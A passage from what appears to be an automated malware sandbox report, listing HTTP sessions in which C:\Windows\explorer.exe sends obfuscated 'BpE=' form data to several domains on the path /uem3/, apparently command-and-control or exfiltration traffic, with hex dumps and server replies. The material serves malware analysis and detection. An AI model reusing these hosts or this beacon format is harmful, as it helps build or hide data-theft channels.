6c 48 55 7e 51 65 78 45 66 79 45 6b 45 44 65 54 4b 59 36 79 50 43 77 30 66 41 58 52 48 4c 69 65 75 71 73 35 72 39 32 58 37 6b 54 33 42 6c 55 4f 50 68 79 71 43 41 72 7e 58 68 57 5a 51 51 61 64 52 46 56 44 49 70 71 49 74 32 4a 79 30 52 39 47 5a 74 5f 51 4f 41 77 4d 4f 4d 50 57 2d 4f 63 63 44 34 56 78 77 4c 76 4b 68 41 63 72 57 68 6c 28 59 62 75 76 54 56 6d 59 6e 70 6b 28 56 65 69 35 4a 31 58 34 66 31 71 6b 38 59 63 52 6b 74 32 42 68 59 45 6d 32 51 59 42 30 35 56 55 69 49 56 69 49 79 4b 74 75 58 43 65 47 54 6c 69 4f 66 4e 55 68 53 30 72 75 35 45 36 41 39 49 58 64 67 63 4d 37 6a 54 56 52 4d 6b 6c 45 28 62 36 7a 50 56 45 31 53 49 39 78 47 62 4b 68 47 39 6d 58 37 6d 44 70 66 5f 70 59 77 79 7a 43 49 54 64 79 48 43 32 62 42 36 74 71 50 4a 49 35 6d 46 6c 2d 37 4a 53 42 79 37 7a 70 78 4e 7a 68 46 56 7a 4e 4e 76 28 53 77 57 65 41 57 67 50 41 32 68 74 43 4e 45 69 75 71 36 62 30 41 57 31 4f 45 51 47 68 7e 55 47 31 35 6b 35 64 54 64 63 36 52 58 4f 36 65 71 37 2d 36 71 50 59 6b 71 51 41 6a 35 48 66 79 76 6c 73 32 51 76 78 6c 66 72 4b 58 58 4b 72 28 73 57 59 6a 78 42 76 34 4e 6b 35 6d 42 6a 30 6b 5f 75 46 34 6f 54 79 41 47 6a 6f 41 75 41 35 57 5f 55 57 37 44 36 58 4e 42 32 51 59 76 58 51 53 32 62 7a 78 52 67 68 74 34 79 74 77 4a 75 56 59 6b 50 65 6c 6d 41 42 57 6f 4f 6a 57 5f 55 62 39 43 58 4f 51 72 66 45 55 66 4d 74 56 72 28 53 64 2d 63 7a 33 61 30 37 69 4f 75 50 4c 52 43 70 46 6d 6c 5a 61 54 6a 74 54 32 70 68 6e 45 28 76 76 51 5a 7a 68 66 7e 49 38 35 53 53 38 6f 7e 62 64 72 48 48 68 5a 64 67 69 71 45 79 76 71 61 4d 38 4d 71 4e 41 70 61 31 50 6c 49 76 78 66 45 4c 59 76 35 52 36 44 7a 43 51 52 72 39 39 4e 6b 55 6c 4e 69 32 58 76 33 4c 6b 31 67 47 45 36 41 6c 76 61 36 57 32 4d 48 35 48 78 28 62 4e 44 38 78 57 71 33 42 4c 6a 37 37 30 6b 39 79 34 46 38 69 49 45 68 69 68 4e 5a 73 6f 6f 34 56 4d 41 67 79 54 6a 44 33 71 6a 51 31 79 38 79 52 30 6b 4a 37 47 37 41 67 67 4b 56 4b 36 72 70 72 38 32 5a 58 43 77 66 74 33 34 6e 78 37 4f 38 5f 43 2d 6b 51 68 66 55 63 4b 49 4d 62 64 4b 57 7a 6c 30 79 6d 79 69 4d 75 31 56 6e 59 39 5f 46 61 59 71 44 4e 44 64 47 79 32 34 4a 72 68 41 65 2d 79 72 76 4b 6d 59 45 72 7e 55 56 72 58 30 47 6b 5a 55 54 65 46 68 41 75 30 63 74 7a 45 6a 61 39 54 6c 52 6c 75 42 63 69 75 6a 44 49 41 76 54 58 68 5a 6a 51 35 34 4b 4f 53 7a 67 32 52 47 71 4c 61 35 76 30 59 6b 62 2d 71 37 65 7a 64 6c 70 2d 50 70 37 4d 6e 35 43 38 4d 2d 33 62 4a 52 58 67 33 76 6b 68 34 4e 7a 43 58 64 4d 36 32 4c 4a 42 78 7a 50 67 4e 4a 6e 67 42 46 73 33 63 54 51 62 55 61 72 32 63 4a 4e 57 73 51 35 5f 78 42 34 42 4f 62 54 62 57 50 71 37 67 42 4a 66 56 35 46 73 41 73 6d 4f 46 65 55 36 7a 46 35 4d 36 4c 69 42 45 41 37 55 62 70 67 47 35 79 67 51 7a 75 36 30 62 76 61 71 7e 74 67 7a 6f 6e 6b 68 44 37 6c 56 7a 6a 4b 79 72 35 31 72 77 6a 61 50 7e 77 64 4a 35 39 42 58 6e 53 74 73 31 67 7a 57 64 73 30 4e 51 69 63 45 6c 72 47 73 31 69 76 44 28 54 59 75 68 71 50 38 38 41 6d 61 58 7a 4f 7a 58 37 75 64 72 38 6b 6e 45 4e 35 65 38 78 43 6a 52 4f 44 51 38 31 50 54 50 4a 34 7a 77 59 61 64 4a 44 55 5f 32 43 62 43 34 33 5a 34 67 4e 43 6f 6b 63 31 63 41 59 4d 53 63 4a 70 33 4e 57 47 68 58 57 30 58 30 31 37 64 74 6d 69 51 41 30 70 77 39 62 63 51 42 68 42 34 72 76 6f 5a 68 42 48 2d 4f 47 47 4a 41 50 62 45 41 68 42 48 61 50 71 64 4a 51 66 54 38 41 68 51 4b 78 55 4a 58 78 59 6e 6e 6f 4f 32 39 67 59 5f 47 48 77 38 75 6a 77 46 57 49 43 30 6f 6e 64 39 6b 79 52 6f 6c 47 56 41 44 6c 37 66 6f 35 4e 73 51 56 46 38 68 57 50 48 6d 39 7a 75 72 38 44 39 77 33 4d 44 4a 66 70 2d 32 57 75 43 64 51 59 6a 4c 52 57 55 28 65 64 51 51 57 43 59 5a 64 66 68 69 4f 6e 74 31 33 65 39 6c 6f 4a 49 4a 32 74 64 37 46 6d 79 64 73 66 46 6c 63 6e 73 4e 54 64 58 32 75 67 35 53 65 32 77 67 4e 59 52 4e 31 6f 51 47 4b 44 62 36 70 4a 51 45 65 42 65 28 78 69 67 32 79 38 4f 78 63 68 71 30 52 53 6b 51 76 7e 58 6c 36 75 4b 7a 34 7a 6b 72 47 56 77 55 72 6e Data Ascii: BpE=a0n5I9rZnPI6I1s-kWhJK2ZbvZJIbFE7gF3iEO49ClCdVAx6EU7Z9zTf8g5b1T9YumdOY7wRTeDsr-mlu0alHU~QexEfyEkEDeTKY6yPCw0fAXRHLieuqs5r92X7kT3BlUOPhyqCAr~XhWZQQadRFVDIpqIt2Jy0R9GZt_QOAwMOMPW-OccD4VxwLvKhAcrWhl(YbuvTVmYnpk(Vei5J1X4f1qk8YcRkt2BhYEm2QYB05VUiIViIyKtuXCeGTliOfNUhS0ru5E6A9IXdgcM7jTVRMklE(b6zPVE1SI9xGbKhG9mX7mDpf_pYwyzCITdyHC2bB6tqPJI5mFl-7JSBy7zpxNzhFVzNNv(SwWeAWgPA2htCNEiuq6b0AW1OEQGh~UG15k5dTdc6RXO6eq7-6qPYkqQAj5Hfyvls2QvxlfrKXXKr(sWYjxBv4Nk5mBj0k_uF4oTyAGjoAuA5W_UW7D6XNB2QYvXQS2bzxRght4ytwJuVYkPelmABWoOjW_Ub9CXOQrfEUfMtVr(Sd-cz3a07iOuPLRCpFmlZaTjtT2phnE(vvQZzhf~I85SS8o~bdrHHhZdgiqEyvqaM8MqNApa1PlIvxfELYv5R6DzCQRr99NkUlNi2Xv3Lk1gGE6Alva6W2MH5Hx(bND8xWq3BLj770k9y4F8iIEhihNZsoo4VMAgyTjD3qjQ1y8yR0kJ7G7AggKVK6rpr82ZXCwft34nx7O8_C-kQhfUcKIMbdKWzl0ymyiMu1VnY9_FaYqDNDdGy24JrhAe-yrvKmYEr~UVrX0GkZUTeFhAu0ctzEja9TlRluBciujDIAvTXhZjQ54KOSzg2RGqLa5v0Ykb-q7ezdlp-Pp7Mn5C8M-3bJRXg3vkh4NzCXdM62LJBxzPgNJngBFs3cTQbUar2cJNWsQ5_xB4BObTbWPq7gBJfV5FsAsmOFeU6zF5M6LiBEA7UbpgG5ygQzu60bvaq~tgzonkhD7lVzjKyr51rwjaP~wdJ59BXnSts1gzWds0NQicElrGs1ivD(TYuhqP88AmaXzOzX7udr8knEN5e8xCjRODQ81PTPJ4zwYadJDU_2CbC43Z4gNCokc1cAYMScJp3NWGhXW0X017dtmiQA0pw9bcQBhB4rvoZhBH-OGGJAPbEAhBHaPqdJQfT8AhQKxUJXxYnnoO29gY_GHw8ujwFWIC0ond9kyRolGVADl7fo5NsQVF8hWPHm9zur8D9w3MDJfp-2WuCdQYjLRWU(edQQWCYZdfhiOnt13e9loJIJ2td7FmydsfFlcnsNTdX2ug5Se2wgNYRN1oQGKDb6pJQEeBe(xig2y8Oxchq0RSkQv~Xl6uKz4zkrGVwUrng9cDOjba3O0ud5tD8qW71w1TRT7ZYhS5EQWYjU5D64gTM4ydJJSq1YRtjXSdBmBll(ytk6UD-i6n_ytrDmSDF2LrRQvadl40mA2Q0kz~zLbleTLyiwbIkb-GNnnNLbJS-FTOZ(DMuDbmSc4Xg3XjZVwjsYEfTICba~jhV~Nar334lfY2kOQ0vSfl4C4z14RsDItvFJDbPwF8DIbnFu0X5UtelpmSfa7Gbkmiozg6COh8cl9fLxRRrSBMGWmaEiZ1sjYIym5mib-7lN0LXEp0AHWzxRKrsalHIxYXuOV6YaHNuZNK5zbltvobsbmNiFB51SD4ewIVWcuhvb3OwLu6C7QwmMenpi9QktQSi5GUQG8U31CFDZyglr0YG1IW1lktjVHiYGejNjI9r3_c18DNQKMVma6NoNg35vy(yAkKAtupl(l0QkPMlv8~_FjkRLc4TPfz8OQPodGnpviGevt6revqQBYyD1hrqtctQES1-e5tWVqiUnERTMeA4fNQT0wSTXhVGsRQwKFnTCyv8M4iUBJma3Gg02QHAYsUp9NHr~J(IZ25eGATQT7mM5hsC(UHgMPD1sFrpK4gkG9m-Hw83HL1WYeGgxrzPwRXyu1k3lSviU2F_kX(o2wFuV9gooFPwbC4kWRYgdLyuENg-Pp2qXrT6PQ48wkDrGOOZqaOnvPjuER3uoH~RKZLCMk0EagHrxuGUEf1qrUdosGf61cpHqOxNnP6eZVGLsN4SZX4pwyskvyqt68ySEqHKTii2PxPAi9st4EVFsGnqskuhEFS6xmR0gI2s9H0Z~KrWWZplCm3kLaQFMJK_IAH5BtcCCvn7e26YUR4G3ylKcOZhlPhk2bl84syvhjxmVBmS4EdR602Wm5QUpsRCPZFmzWusGNPSLWSMKLOQLYxxuP6sqtTxFPZQNr0yJNqlciGeRQ0mXceSknnNLMud~2Gm4chzy21Ejg2yFZ7wX8UDLyyPB7UaJ1pjv6zIb2Fq0JqdRvsQHrygvubCwoig5u2crJOqmgC2EBW7sy9xPZlFPmdh9IIHA3jG8a3oGA6xOUnGG_av~sWaXfcSX09H0T1qrzEpm8YC8imPvOf1kbGn1vVBCoigXId_9t56VpBjlEWgRdkihkIm9G3rNAEq95pLkOwauX~NusaBAJjkJnh07upbyZJLa5J7NkL7rFMvZJ7z6bp1EAU6m_nAQglvNe(OL0j9uuhRKMBCb2VsESrVG_aUXZ0U6FMNyoRJYSOWOJTR9k1_Nk5bUyu7sQ6kNZzx8avnwRVgq_vt9m8kHtVgpDbfrvPldWjFlTB07wMKeUnI9VHMZx1JNtvrZ7mh40S-m5H_y4W8zymK0VdJrc9-H5CYLCnv~P2B4oJNjm3lPfBoFUbzQuUiR7AsldY9VMPwwg7fcWWFRHScEgE_7odDuPPA0BCeF5uZFJ7cRMufilU7oe5LNZJjWLCdlGEtqMzKc92iU5uU~xh33t89CXqAyLGdF3EWtMeF6e~Y7kPxwqUqSSUQAzRCELP69kODKqMX(TPsAmS9ddAlhKgyjozjJnnYQDccWvzfZH7MeyNGpvXvSStf2J4QAalUVd7guzvzpTxQ9d2v7MCMVK2YqXiAsvASIG9fh9YvcXAACtIR(gbmeULZwcpiimx60ZK5DuBfkcL9DSNx7YmcwBCzPkPNA1O1bw9-zgIHXrTv2AayjMa8K0MR1YqghTu8qQ0w5S15cTE3BiOhIdYb~oOwaj1tdiknurRAleIb60vMBOKZKNL3UucEKlz6wNRdW2Bw1f7A1S1c~dM_ghms3HF9mQNcXIZxhrU-Q2WmKqjRHbCQ~jh_t9iG5tMMC3GRxwWyTebNgUL773tSIOtbBtq7~PFOauDZomyRWHLymypkbiJO0tCPRCYrZ6Au2chrLZRJiTS_3KupzIYquFE0OUjmZYlDxL1dg4cWP2Hiz2ZuAJOkMzZB7o~ePMQ01uJqaLLMLPYe68K5ODmkqEivlrg1SauxVVtAuX54lriAjgnXHicL~bAJUmqNxvIxrvBFVmi3iwy-KrjbIphlNSLRIEX8atPxH_UDHtBrRHoaqPY6hw0j4gffzR~YzfBruPJawpHFLPfAj0nOxq41TIt0g1Sc4JtZL9qOVwNsctW1Kx8XGRxS9ZbrCIJmlcJlkSvSkXctckYx(tW6sx6GcwZOBQrxwFIS49bTdteey6dku8VLrljirY0ZbtJXXzWFlYnd04gjIAbjtR3KJ8wo59uQssJsQJcHTakNYvtf3M5YEe0Ueed8OWraAuQMtu0ChlCFyLARAKe_Wr153TyaPVOgNculDWxGCMg6VjFJ0zWG0wTzmUMq3qua4Umms0I49P5QI_Zg2nHPp-EsZzMRsfOWLMh6NzuiuB0R~5ee6lecYliw3mSW9hyDziBRepb3DeNQGX5XythMoT60i7PjGPHB4zQmgTV4m8~paldS(eq6PQt3wUuF0-SUyGoZ2_Pa42X5z9LXFYnrgGEbHAekdK9hCKk0ldP1AOh7ziZ0UhdGf_5mpVfylaq3(iqQS7GAr7GvpU9bCPiQjC3m6AsHa-aLXH1dpn~5XLS4aij7UJiQLRTm7ShooBz5ApQajJE6UYha4v40uXFH7l~XCMYIX-1fyEfNpiyxWFuqg0DUlY7jtwUAYvZgOgpckRCUAMYSmrZIcN6qULupjS41dLxhbObll-Q6RdlnILdasahrrDqM(3jmtm~iLm
Jun 21, 2022 21:09:08.854281902 CEST	11053	OUT	Data Raw: 55 33 75 54 79 41 2d 42 72 6b 6d 61 6f 38 56 63 71 61 65 76 52 57 4f 70 73 76 5f 56 48 78 55 61 4f 77 4e 6a 37 6e 44 49 47 6b 46 54 61 48 51 67 39 5a 62 78 47 6f 42 48 32 77 38 4a 2d 47 5a 51 38 57 4e 61 31 50 6c 35 48 6a 33 44 41 56 52 4e 73 6f Data Ascii: U3uTyA-Brkmao8VcqaevRWOpsv_VHxUaOwNj7nDIGkFTaHQg9ZbxGoBH2w8J-GZQ8WNa1Pl5Hj3DAVRNso2PpWksMW3chvHH9i1AEe_fDrK6GKcsqdzeZm6OqZQOWXEu3e-VxEJvUbrpMDpYZHqKGVnI8M9RJfbFaNI6aLRNDtZgffbet3-BuEwNDiNvefdbKqoX5akaxGWeEPDM9(3XMO_bg9Ug7D6nN~rqWQaEq5BJRwCX2b4
Jun 21, 2022 21:09:08.854358912 CEST	11060	OUT	Data Raw: 4e 71 61 37 6d 4e 41 68 4d 6b 4c 79 50 31 4b 44 7a 6a 6d 46 74 4f 66 64 4b 53 56 48 39 46 44 66 6d 52 36 69 74 59 47 33 4c 46 4b 6b 70 56 42 6b 52 39 69 56 5a 31 42 5a 6a 6a 35 79 62 6b 4e 28 72 66 7a 4b 35 48 51 47 68 7a 4d 32 34 62 6c 32 66 37 Data Ascii: Nqa7mNAhMkLyP1KDzjmFtOfdKSVH9FDfmR6itYG3LFKkpVBkR9iVZ1BZjj5ybkN(rfzK5HQGhzM24bl2f7U~qeuqPu8erg0l8XiE_r70Ev0UX7QZv5JC6iVv7lrk3RYegd_euxsIHv9YtFQ8dwbp9b59gA_s1shgt~miwN0KrH8Gd6wRur99k0TBE2Wq120rc6YZP0-finPplkaQEowtvYX4Ywe1q~Tam5jCP4jbOdY~BV-vCDd
Jun 21, 2022 21:09:08.854453087 CEST	11063	OUT	Data Raw: 58 30 61 52 58 79 58 75 61 78 71 63 76 4c 44 74 46 31 79 58 78 6f 71 30 72 53 72 6b 7a 28 6f 46 6a 50 66 35 31 4d 78 43 6d 54 65 49 4f 68 6b 32 35 48 42 6c 42 37 35 33 6c 5a 6d 43 63 63 6c 4b 57 58 6d 35 6b 31 6f 72 43 38 50 5a 65 77 75 44 54 71 Data Ascii: X0aRXyXuaxqcvLDtF1yXxoq0rSrkz(oFjPf51MxCmTeIOhk25HBlB753lZmCcclKWXm5k1orC8PZewuDTq45H1yyf505qBJenIkqufHW7yrMRnMrQIIsOxjUnrxhnS6Y6BFnDyl3zKiq_bnpNoqHUJsM9wRL2S3uUJd31UN8nDK(yfGMQbsG5eVIXc3eIzgxioY(VrIAKugu7x844bjKYzhfrnq1iQqgBvceJrn8LFrk9cumpNZ
Jun 21, 2022 21:09:08.854469061 CEST	11066	OUT	Data Raw: 55 56 47 56 31 4b 45 73 37 61 7a 30 75 44 62 57 41 6b 39 7a 46 6c 6c 50 37 72 45 7a 5a 6f 79 6c 57 64 63 49 63 32 54 66 54 48 35 41 66 32 73 69 52 70 77 31 6a 79 7a 48 79 6b 36 49 37 6b 55 39 53 55 78 42 2d 5a 63 64 55 55 63 66 50 46 74 59 56 4d Data Ascii: UVGV1KEs7az0uDbWAk9zFllP7rEzZoylWdcIc2TfTH5Af2siRpw1jyzHyk6I7kU9SUxB-ZcdUUcfPFtYVMb44HFsgeMmBjDYjkoaelX5nrEQCnwPqvE(_w9sUjC04B8Z0p_~jRwmaAy0vunCwXtZBmNfisSt97cu4bYN-3NpDMOhWeLTcZnkwh6j9QevCK0y-7YEcSpEmYAkfGQJSBnt-hYpSnpnW7lxDL-VIQVFPOEcS8GmWn3
Jun 21, 2022 21:09:08.854481936 CEST	11069	OUT	Data Raw: 37 7a 69 47 66 50 7a 7a 2d 59 34 45 78 52 51 49 59 6e 57 30 53 6a 36 56 74 79 6c 75 6e 4f 77 77 36 32 36 32 42 54 73 55 66 46 35 61 47 44 74 37 54 37 5a 32 31 57 6a 28 6a 4a 45 42 73 50 6f 50 6f 61 4d 62 66 33 4d 6a 75 70 6f 72 4f 7a 63 35 51 31 Data Ascii: 7ziGfPzz-Y4ExRQIYnW0Sj6VtylunOww6262BTsUfF5aGDt7T7Z21Wj(jJEBsPoPoaMbf3MjuporOzc5Q1fL9CRH-rMY0xXa0qkOy4JtqWQMqOYg3m8QhvSS4pGKQ74kl2L37(_Be24(8Bmc41PXHr4U2nbYHQaYtl7w6iecIenj4WNlI86mrZlO0pcV9cQ(cyWHozCJF(ffBJw02RUO7mE8KsrqcLmGdcSmtWmbtREALsd56X5
Jun 21, 2022 21:09:08.854600906 CEST	11071	OUT	Data Raw: 31 75 65 73 49 39 78 39 6f 5a 44 6a 73 39 70 7a 54 58 74 28 66 41 6b 62 46 55 46 7a 56 78 6c 6e 68 73 5a 6a 33 4a 4c 57 4c 59 31 51 31 28 5a 4d 69 64 34 4c 78 31 39 77 64 61 77 55 79 31 55 55 54 6d 4f 56 4e 6b 33 79 43 33 47 6d 74 54 2d 57 74 6a Data Ascii: 1uesI9x9oZDjs9pzTXt(fAkbFUFzVxlnhsZj3JLWLY1Q1(ZMid4Lx19wdawUy1UUTmOVNk3yC3GmtT-WtjAjoIdb027QyXuGqeVWzOy5Y(srDOcKTrwa6Ra(5TEAzx153QvJOJFs832RSKfqP2ZcNUfSU~hsyEl4CY34yDtcmXmRAjgRhxTQ_1EHplVRhy_cSLfuIV4HpDrymrLZZOvHypbdRQbvt6YJVMs(sv8K5CwUwYJUSKw
Jun 21, 2022 21:09:08.854617119 CEST	11074	OUT	Data Raw: 57 6f 56 6f 4e 6b 4c 53 77 69 35 35 79 52 42 4d 51 63 5a 76 6f 62 72 76 76 43 31 30 77 72 34 4f 59 68 2d 69 74 76 7a 50 38 41 69 6f 6a 48 76 65 47 42 67 62 7a 75 52 70 5a 67 6d 46 70 63 44 62 31 6c 56 5a 34 32 34 31 4f 6c 58 48 79 66 55 78 77 6a Data Ascii: WoVoNkLSwi55yRBMQcZvobrvvC10wr4OYh-itvzP8AiojHveGBgbzuRpZgmFpcDb1lVZ4241OlXHyfUxwjdGjrHdeqXnAvxOrAaqYHFA4F5PTdCEBbU3nSccjXg6boV7k4vo28r7dnMaRUp3m~_ufEI6TlEDRLKgxUR(BFZQTjCRLfOxFb7rr2UQVJ9UcqTdTYH39pipuUTj_fZ(VwjogSnedMPpy6ThaDHUzXQ9QfAVYljYY~K
Jun 21, 2022 21:09:08.863214016 CEST	11074	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 21 Jun 2022 19:09:06 GMT content-type: text/html content-length: 138 location: http://www.domainedelapoujade.info x-iplb-request-id: 66818F35:C2C8_D5BA2105:0050_62B21754_F863F4:2BF12 x-iplb-instance: 16978 set-cookie: SERVERID77446=2001710\|YrIXV\|YrIXV; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49865	213.186.33.5	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:08.854872942 CEST	11074	OUT	GET /uem3/?SH=IDKTKDM&BpE=V2TDWYSqi/8fdllEzj4AbTg97NFaRkku6BamUZomS0y+YREnVG6xukPcgSdf2jxlzQp6 HTTP/1.1 Host: www.domainedelapoujade.info Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:09:08.893474102 CEST	11076	IN	HTTP/1.1 302 Moved Temporarily server: nginx date: Tue, 21 Jun 2022 19:09:06 GMT content-type: text/html content-length: 138 location: http://www.domainedelapoujade.info x-iplb-request-id: 66818F35:C2C9_D5BA2105:0050_62B21754_671B274:25AAA x-iplb-instance: 16982 set-cookie: SERVERID77446=200175\|YrIXV\|YrIXV; path=/; HttpOnly connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49870	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:19.008758068 CEST	11170	OUT	POST /uem3/ HTTP/1.1 Host: www.homesteaddesignstudio.net Connection: close Content-Length: 713 Cache-Control: no-cache Origin: http://www.homesteaddesignstudio.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.homesteaddesignstudio.net/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 52 35 52 61 46 38 52 45 7e 64 76 43 30 32 6c 68 30 58 47 30 66 39 38 6d 6d 6c 45 70 41 44 50 66 45 32 6f 55 7a 44 62 7a 78 66 6e 6d 42 32 53 37 66 72 4c 31 72 37 33 6c 53 36 70 6c 43 55 6f 53 4a 75 56 4f 42 48 31 69 59 6c 62 33 36 4d 37 41 37 36 6d 2d 4e 74 39 61 58 78 61 69 28 66 6e 33 45 68 45 77 4b 34 7e 30 62 39 49 43 39 52 76 37 47 50 32 33 76 47 39 61 28 32 38 62 50 57 56 51 6a 6d 43 41 63 70 35 68 4a 66 62 31 58 39 6d 32 41 35 74 59 44 51 4c 31 45 68 79 78 78 54 35 6f 30 51 78 77 4f 66 4b 43 65 6e 77 74 75 2d 66 50 45 42 31 38 49 56 7e 38 36 72 49 31 59 61 77 38 70 33 56 55 49 6c 6e 71 73 6b 72 5a 6f 33 45 36 5a 45 44 4b 54 32 4a 68 50 54 28 4b 5a 37 57 54 7e 6b 4e 78 41 6b 6e 32 77 67 43 54 56 37 6e 62 65 71 51 67 34 6f 57 6a 53 73 62 30 7a 31 59 67 51 5a 45 7a 32 75 6b 65 77 61 33 6b 31 64 67 5f 31 65 38 78 7e 6b 71 64 30 45 7e 43 6b 79 76 44 6c 34 45 5a 6b 61 46 6b 28 72 78 4e 70 6f 50 31 71 74 39 48 54 46 37 67 54 69 6f 4c 49 70 6d 42 7a 56 58 38 32 75 7a 58 53 76 34 50 5a 6d 44 74 63 4c 47 61 75 69 37 6d 4f 33 74 4d 65 72 51 67 35 6d 34 74 57 72 5a 44 34 33 6f 4b 62 2d 68 37 75 72 6c 35 30 41 5a 2d 37 70 34 69 70 31 6c 49 69 5f 78 59 47 63 4f 34 30 58 55 67 43 35 52 38 38 31 7a 77 7a 42 57 58 63 73 62 48 4a 6c 57 74 6f 68 42 37 49 37 48 62 44 6e 74 68 30 67 5a 51 74 58 59 37 55 54 62 62 6c 6f 6a 4a 28 61 75 6b 36 65 6d 48 62 4e 64 77 68 34 62 43 55 46 38 4b 35 36 68 48 28 6b 4b 6a 65 48 73 73 38 54 6e 76 28 61 33 78 47 70 70 69 55 51 46 4f 53 48 59 6c 43 58 78 6f 7a 74 4e 56 70 33 75 4f 43 50 56 62 37 41 52 35 64 4b 49 77 74 66 57 73 53 58 74 6e 55 33 37 37 52 33 43 4c 70 47 45 74 68 6f 46 47 68 4a 28 45 7a 37 67 6c 79 52 51 4b 32 53 63 33 58 79 51 72 44 68 39 54 39 52 4b 59 33 64 69 4d 43 57 6a 64 42 46 4e 70 67 48 4a 75 4c 56 4d 35 57 64 4d 66 39 74 32 32 47 4e 30 38 56 79 39 62 32 48 56 35 74 6e 46 73 74 61 36 45 33 75 53 4c 42 47 75 43 6e 35 6e 52 41 5f 76 59 55 4b 67 66 6c 30 59 54 65 42 28 35 51 41 44 57 38 4a 32 67 72 6a 66 56 78 5a 64 67 4e 33 47 57 66 73 52 46 32 36 75 69 75 43 6e 47 7a 32 43 7a 30 4f 46 61 4a 6c 38 57 42 46 6d 2d 33 68 6f 36 48 77 34 50 6c 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=R5RaF8RE~dvC02lh0XG0f98mmlEpADPfE2oUzDbzxfnmB2S7frL1r73lS6plCUoSJuVOBH1iYlb36M7A76m-Nt9aXxai(fn3EhEwK4~0b9IC9Rv7GP23vG9a(28bPWVQjmCAcp5hJfb1X9m2A5tYDQL1EhyxxT5o0QxwOfKCenwtu-fPEB18IV~86rI1Yaw8p3VUIlnqskrZo3E6ZEDKT2JhPT(KZ7WT~kNxAkn2wgCTV7nbeqQg4oWjSsb0z1YgQZEz2ukewa3k1dg_1e8x~kqd0E~CkyvDl4EZkaFk(rxNpoP1qt9HTF7gTioLIpmBzVX82uzXSv4PZmDtcLGaui7mO3tMerQg5m4tWrZD43oKb-h7url50AZ-7p4ip1lIi_xYGcO40XUgC5R881zwzBWXcsbHJlWtohB7I7HbDnth0gZQtXY7UTbblojJ(auk6emHbNdwh4bCUF8K56hH(kKjeHss8Tnv(a3xGppiUQFOSHYlCXxoztNVp3uOCPVb7AR5dKIwtfWsSXtnU377R3CLpGEthoFGhJ(Ez7glyRQK2Sc3XyQrDh9T9RKY3diMCWjdBFNpgHJuLVM5WdMf9t22GN08Vy9b2HV5tnFsta6E3uSLBGuCn5nRA_vYUKgfl0YTeB(5QADW8J2grjfVxZdgN3GWfsRF26uiuCnGz2Cz0OFaJl8WBFm-3ho6Hw4Plw).
Jun 21, 2022 21:09:19.127027035 CEST	11209	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Tue, 21 Jun 2022 19:09:19 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Vb6Xg1wX9h+8IVM6oavKYr4qS3BbvK+Vi/COfO9acqdR24MSbk7eCNrLGCAHjL6MF7/qlIYIOFCuW+qPnUzxfw Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49871	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
